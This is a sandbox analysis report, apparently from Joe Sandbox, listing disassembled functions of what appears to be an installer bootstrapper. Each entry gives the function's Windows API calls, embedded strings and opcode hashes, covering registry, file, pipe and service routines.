RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll), ref: 000D4305

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

Part of subcall function 000D10C5: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 000D10ED
Part of subcall function 000D10C5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,000A6EF3,00000100,000000B0,00000088,00000410,000002C0), ref: 000D1126

Strings

crypt32.dll, xrefs: 000D423D
\, xrefs: 000D428E
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 000D4244
PendingFileRenameOperations, xrefs: 000D4270

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseFindQueryValue$FileFirstOpen
String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
API String ID: 3397690329-3978359083
Opcode ID: 4a13dea24eb797e21f2fba4af2b0d699c2d21245f08e8f761da2bced3e814ccb
Instruction ID: 485818fc2d019c3e0946bdea093379556dc30c2bde33f4bef35b9b26aa30fbc5
Opcode Fuzzy Hash: 4a13dea24eb797e21f2fba4af2b0d699c2d21245f08e8f761da2bced3e814ccb
Instruction Fuzzy Hash: 8F319F35A00319BBDF21AFD5CC81ABEBBB9EF00750F99817BF904A6251D7319A40DB64

Function 0009EEF9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,000A04CB,00000001,00000001,00000001,000A04CB,00000000), ref: 0009EF70
RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,000A04CB,00000001,00000001,00000001,000A04CB,00000000,00000001,00000002,000A04CB,00000001), ref: 0009EF87

Strings

Failed to format key for update registration., xrefs: 0009EF26
Failed to remove update registration key: %ls, xrefs: 0009EFB4
PackageVersion, xrefs: 0009EF51

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: 57f1f04602ac73c535cb9ef55ce6ef65ff2d530f7f1ffe25f746cd8184d3e504
Instruction ID: 37db6e936b72bc9fd84e7b2d464c346ca9fefee7e9a163e67ebb150aa1f4d96e
Opcode Fuzzy Hash: 57f1f04602ac73c535cb9ef55ce6ef65ff2d530f7f1ffe25f746cd8184d3e504
Instruction Fuzzy Hash: FC21D232A00258BFDF11DAA5CC46FDFBBB8EF04711F21417AF904A6291D7319E4096A0

Function 0009EE0F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0009EE4A

Part of subcall function 000D4038: SetFileAttributesW.KERNEL32(000B8FFA,00000080,00000000,000B8FFA,000000FF,00000000,?,?,000B8FFA), ref: 000D4067
Part of subcall function 000D4038: GetLastError.KERNEL32(?,?,000B8FFA), ref: 000D4071

Part of subcall function 00093B6A: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,0009EE95,00000001,00000000,00000095,00000001,000A04DA,00000095,00000000,swidtag,00000001), ref: 00093B87

Strings

swidtag, xrefs: 0009EE59
Failed to allocate regid folder path., xrefs: 0009EEB0
Failed to allocate regid file path., xrefs: 0009EEA9
Failed to format tag folder path., xrefs: 0009EEB7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AttributesDirectoryErrorFileLastOpen@16Remove
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
API String ID: 1428973842-4170906717
Opcode ID: 6d968c44b2204f4aaf94e4b9693c0802d40e8d53089695bdeadc66dde5aeffac
Instruction ID: 19ab870932b2a481efc9256dfac73fb361c0e9a4223e77a7e66f1fdb4255810a
Opcode Fuzzy Hash: 6d968c44b2204f4aaf94e4b9693c0802d40e8d53089695bdeadc66dde5aeffac
Instruction Fuzzy Hash: 57216132D00658FFCF15EB9ACC02ADDBBB5EF44710F14C06AF518AA262D7319E50AB50

Function 000B8B73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 000B8BF7
RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,0009F66B,00000001,00000100,000001B4,00000000), ref: 000B8C45

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 000B8B94
Failed to enumerate uninstall key for related bundles., xrefs: 000B8C56
Failed to open uninstall registry key., xrefs: 000B8BBA

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: fb1bd40a9491e3935fd9fdfa6382cf82a9aeae97e6fd9e7fd37a94624da7bcbe
Instruction ID: 260092733f56b76707d1a1fb6288e45a74b0cc1bfff5ae2cc75d6d26d227af5d
Opcode Fuzzy Hash: fb1bd40a9491e3935fd9fdfa6382cf82a9aeae97e6fd9e7fd37a94624da7bcbe
Instruction Fuzzy Hash: 9C219172901218FFDB21AAA4CC46FEEBB7DEB00321F248665F910761A1CB754E90D7A4

Function 000D3F04 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,00094CB6,00000000,?,?,00000000,?,000D4012,00000000,00094CB6,00000000,00000000,?,000A83E2,?,?), ref: 000D3F1E
GetLastError.KERNEL32(?,000D4012,00000000,00094CB6,00000000,00000000,?,000A83E2,?,?,00000001,00000003,000007D0,?,?,?), ref: 000D3F2C
CopyFileW.KERNEL32(00000000,00094CB6,00000000,00094CB6,00000000,?,000D4012,00000000,00094CB6,00000000,00000000,?,000A83E2,?,?,00000001), ref: 000D3F92
GetLastError.KERNEL32(?,000D4012,00000000,00094CB6,00000000,00000000,?,000A83E2,?,?,00000001,00000003,000007D0,?,?,?), ref: 000D3F9C

Strings

fileutil.cpp, xrefs: 000D3FBA

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: 2f0a2a3705ccf7ff877a0b485fabbb6d490ae95e13506b652cd2d9834d7da7d2
Instruction ID: ef3715572faabe61e061c489f4930248a75a63a6720ed1685997a8a739cec77d
Opcode Fuzzy Hash: 2f0a2a3705ccf7ff877a0b485fabbb6d490ae95e13506b652cd2d9834d7da7d2
Instruction Fuzzy Hash: 0921A136E4532AAAEB601F659C44B7BB6E8EF40BA0B160037FD05DB250D765CE0192B2

Function 000BD047 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BD0DC
ReleaseMutex.KERNEL32(?), ref: 000BD10A
SetEvent.KERNEL32(?), ref: 000BD113

Strings

Failed to allocate buffer., xrefs: 000BD08B
NetFxChainer.cpp, xrefs: 000BD081

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate buffer.$NetFxChainer.cpp
API String ID: 944053411-3611226795
Opcode ID: a5875cf16227dd6c021c144ca1636d3371dba9d7e1b3ec33aa43adb979b41947
Instruction ID: 1e7d6914de172229517941fa9d48f0cc0d9f5fb454b487795577f482fec2ff14
Opcode Fuzzy Hash: a5875cf16227dd6c021c144ca1636d3371dba9d7e1b3ec33aa43adb979b41947
Instruction Fuzzy Hash: F421A3B560030ABFDB109F68D845AA9F7F5FF08314F10862AF92497352D775A950DB60

Function 000D57BF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,000B68CE,00000000,?), ref: 000D57D5
GetLastError.KERNEL32(?,?,000B68CE,00000000,?,?,?,?,?,?,?,?,?,000B6CE1,?,?), ref: 000D57E3

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,000B68CE,00000000,?), ref: 000D581D
GetLastError.KERNEL32(?,?,000B68CE,00000000,?,?,?,?,?,?,?,?,?,000B6CE1,?,?), ref: 000D5827

Strings

svcutil.cpp, xrefs: 000D5806, 000D5848

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ConfigErrorHeapLastQueryService$AllocateProcess
String ID: svcutil.cpp
API String ID: 355237494-1746323212
Opcode ID: 4a7b16cdc3310177e87451dc4547bb31471e164f64544473de1af3bf1c0dc90c
Instruction ID: bcf80daab6d0bd721f80b2f9027964049cd33bfce5ef0fe5d062f802c5e9e543
Opcode Fuzzy Hash: 4a7b16cdc3310177e87451dc4547bb31471e164f64544473de1af3bf1c0dc90c
Instruction Fuzzy Hash: 4121F632A40724FBEB305A568D05BAB7AECDF44B91F110116FD15FB250DA25CD01A6F0

Function 000996F4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00099783

Strings

Failed to read next symbol., xrefs: 0009979F
Failed to find variable., xrefs: 00099770
condition.cpp, xrefs: 00099725, 00099766
Failed to parse condition '%ls' at position: %u, xrefs: 00099735

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: _memcpy_s
String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
API String ID: 2001391462-1605196437
Opcode ID: 7dc3c370e3ee301d458635ae0dc1af2a33203ce7a41374f42a78fa2200574027
Instruction ID: df3777f397d5128f7d588d2c9cd62acef8dd18474e0c776024d14c7de2110456
Opcode Fuzzy Hash: 7dc3c370e3ee301d458635ae0dc1af2a33203ce7a41374f42a78fa2200574027
Instruction Fuzzy Hash: 8911EB3329831076DF612DECDC86EDB7A59DB05710F04405AFA045D293CA63C910A6F1

Function 00099D03 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00099D25

Strings

Failed get file version., xrefs: 00099D65
Failed to format path string., xrefs: 00099D30
File search: %ls, did not find path: %ls, xrefs: 00099D90
Failed to set variable., xrefs: 00099D84

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
API String ID: 3613110473-2458530209
Opcode ID: 77200e616f7af1e2e9c81cd42b1a193ee58256d41818d9b80a85cd9555c3e4f0
Instruction ID: fec9a1ee8998f8a516b31b6faef8a29cb9ef779dcbbf2904f7255f60b861ed63
Opcode Fuzzy Hash: 77200e616f7af1e2e9c81cd42b1a193ee58256d41818d9b80a85cd9555c3e4f0
Instruction Fuzzy Hash: 24119336D4122DBBCF126E98CC829EEFB79EF04354F14416AF9046A211D6325E50A7E1

Function 000A4880 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,000A51A4), ref: 000A48CC

Strings

Failed to write message type to pipe., xrefs: 000A490E
Failed to allocate message to write., xrefs: 000A48AB
pipe.cpp, xrefs: 000A4904

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$pipe.cpp
API String ID: 3934441357-1996674626
Opcode ID: 7844bc43318dcf4b3cb029fcb538ebf55b30a84feda397ff27413975b16167fb
Instruction ID: d43aab41e142128c4991db2f505e7b1659a9e3f851bcfc8674ce70a8c57e5047
Opcode Fuzzy Hash: 7844bc43318dcf4b3cb029fcb538ebf55b30a84feda397ff27413975b16167fb
Instruction Fuzzy Hash: 34119D76900219FEEB219F99ED09BDF7BE9EB85340F110126FC04A6150D7B09E50DAA1

Function 000D5BBF Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000D5D7F: lstrlenW.KERNEL32(?), ref: 000D5E3D
Part of subcall function 000D5D7F: lstrlenW.KERNEL32(?), ref: 000D5E55

Part of subcall function 000D88BE: GetLastError.KERNEL32(?,?,Qd,000D5C11,feclient.dll,clbcatq.dll,000DB508,000DB4F0,HEAD,00000000,000DB4D8,Qd,00000000,?,?,00000000), ref: 000D88E8

GetSystemTimeAsFileTime.KERNEL32(000DB478,feclient.dll,000DB478,feclient.dll,clbcatq.dll,000DB508,000DB4F0,HEAD,00000000,000DB4D8,Qd,00000000,?,?,00000000,00000000), ref: 000D5C3D

Strings

feclient.dll, xrefs: 000D5C0B, 000D5C2B, 000D5C4F
Qd, xrefs: 000D5BE2
HEAD, xrefs: 000D5BEE
clbcatq.dll, xrefs: 000D5C0A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Timelstrlen$ErrorFileLastSystem
String ID: HEAD$Qd$clbcatq.dll$feclient.dll
API String ID: 451455982-304743534
Opcode ID: 036a3ff373733637814c80cb963737c882064aa5ef5325a7c5d640e5fa562e9a
Instruction ID: 5000e7aabc3cd4edfb1c923f6a84a5bde9a0db35cbc364684c533eaa17dc4a57
Opcode Fuzzy Hash: 036a3ff373733637814c80cb963737c882064aa5ef5325a7c5d640e5fa562e9a
Instruction Fuzzy Hash: 81216D7690170DAFCB02DFA4CD809EEBBB9FF49354B10412AFD04A3210EB319E509BA1

Function 000A8003 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 000938D4: GetProcessHeap.KERNEL32(?,000001C7,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938E5
Part of subcall function 000938D4: RtlAllocateHeap.NTDLL(00000000,?,00092284,000001C7,00000001,80004005,8007139F,?,?,000D015F,8007139F,?,00000000,00000000,8007139F), ref: 000938EC

CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,000A8C10,0000001A,00000000,?,00000000,00000000), ref: 000A804C
GetLastError.KERNEL32(?,?,000A8C10,0000001A,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,-00000004,00000000), ref: 000A8056

Strings

Failed to allocate memory for well known SID., xrefs: 000A8034
Failed to create well known SID., xrefs: 000A8084
cache.cpp, xrefs: 000A802A, 000A807A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateCreateErrorKnownLastProcessWell
String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
API String ID: 2186923214-2110050797
Opcode ID: 1df7212f91095dbd2af4e07cc6b132318c23ef6cff9b2afc314b88cae23d2ca1
Instruction ID: f05d649ae891f0604b7e2a15f7317cb66a485bf03f136b3a94389605cb92f116
Opcode Fuzzy Hash: 1df7212f91095dbd2af4e07cc6b132318c23ef6cff9b2afc314b88cae23d2ca1
Instruction Fuzzy Hash: 37014872645720BAE77066BA5C06F9BBA9CCF41B60F11401BFE08AB281EE658E0056F4

Function 000BDB67 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 000BDB95
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000BDBBF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000BDD8F,00000000,?,?,?,00000001,00000000), ref: 000BDBC7

Strings

Failed while waiting for download., xrefs: 000BDBF5
bitsengine.cpp, xrefs: 000BDBEB

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessageMultipleObjectsPeekWait
String ID: Failed while waiting for download.$bitsengine.cpp
API String ID: 435350009-228655868
Opcode ID: 3b046d0555089b2e1a6df5ef099d9094dd57a42b696e02f6ca28015096cdd24d
Instruction ID: cb4e399d1e52bb7b505050698209c2e5e6a628e8ccbd3203155a628920f28328
Opcode Fuzzy Hash: 3b046d0555089b2e1a6df5ef099d9094dd57a42b696e02f6ca28015096cdd24d
Instruction Fuzzy Hash: E111E932A45329BBE7205AA99C45EEBBB9CEB05720F010127FE04E6181D665990095F4

Function 00095E0B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000010), ref: 00095E39
GetLastError.KERNEL32 ref: 00095E43

Strings

variable.cpp, xrefs: 00095E67
Failed to set variant value., xrefs: 00095E8A
Failed to get computer name., xrefs: 00095E71

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
API String ID: 3560734967-484636765
Opcode ID: d173a9612c897b630b22b0fea85c2155b76a38f655d993897982a793d920a919
Instruction ID: 76c65e530406f0034b030bcbcd27d463259750920d27357cc66e5550224e5a85
Opcode Fuzzy Hash: d173a9612c897b630b22b0fea85c2155b76a38f655d993897982a793d920a919
Instruction Fuzzy Hash: C0018632A41718AAEB11DAA59C05AEF77E8EB08710F010117FD05FB240DA759E0487B5

Function 00095D71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 00095D83

Part of subcall function 000D09BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00095D8F,00000000), ref: 000D09CF
Part of subcall function 000D09BB: GetProcAddress.KERNEL32(00000000), ref: 000D09D6
Part of subcall function 000D09BB: GetLastError.KERNEL32(?,?,?,00095D8F,00000000), ref: 000D09ED

Part of subcall function 000D3BF7: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 000D3C24

Strings

variable.cpp, xrefs: 00095DAD
Failed to get 64-bit folder., xrefs: 00095DCD
Failed to get shell folder., xrefs: 00095DB7
Failed to set variant value., xrefs: 00095DE7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
API String ID: 2084161155-3906113122
Opcode ID: 92b2bdaa2090d1d39041995f229c30d834bd4b95cef4e21cf60184cd82bc8e97
Instruction ID: 98f6be51941d31b2fa28b1f7f597b7a9ea686f73e6b805ab38fcfc267e255c80
Opcode Fuzzy Hash: 92b2bdaa2090d1d39041995f229c30d834bd4b95cef4e21cf60184cd82bc8e97
Instruction Fuzzy Hash: 7401E131901729B7DF22A791CC0BFDE7A689F00322F114156F900BA292CBB58E40E7A1

Function 00096644 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0009667D
GetLastError.KERNEL32 ref: 00096687

Strings

variable.cpp, xrefs: 000966AB
Failed to get temp path., xrefs: 000966B5
Failed to set variant value., xrefs: 000966D1

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

